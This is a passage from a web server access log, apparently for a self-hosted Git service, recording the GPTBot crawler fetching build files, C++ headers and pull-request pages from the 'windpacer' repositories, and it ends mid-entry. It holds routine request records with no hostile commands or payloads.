AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19509] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19509] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15635] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19507] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10323] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11598] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17055] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh?display=source" [Client 74.7.227.38] [Length 15171] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" +[17/Feb/2026:17:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11670] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" +[17/Feb/2026:17:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild" [Client 74.7.227.38] [Length 49754] [Gzip 12.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build" +[17/Feb/2026:17:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild" [Client 74.7.227.38] [Length 46269] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build" +[17/Feb/2026:17:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fdist" [Client 74.7.227.38] [Length 18030] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist" +[17/Feb/2026:17:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fdist" [Client 74.7.227.38] [Length 20033] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist" +[17/Feb/2026:17:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33676] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10809] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11714] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" +[17/Feb/2026:17:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11108] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" +[17/Feb/2026:17:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11896] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" +[17/Feb/2026:17:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11313] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" +[17/Feb/2026:17:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" +[17/Feb/2026:17:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43111] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21751] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10268] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10267] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10301] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10275] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11178] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33373] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:17:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33666] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:37:03 +0000] - 200 200 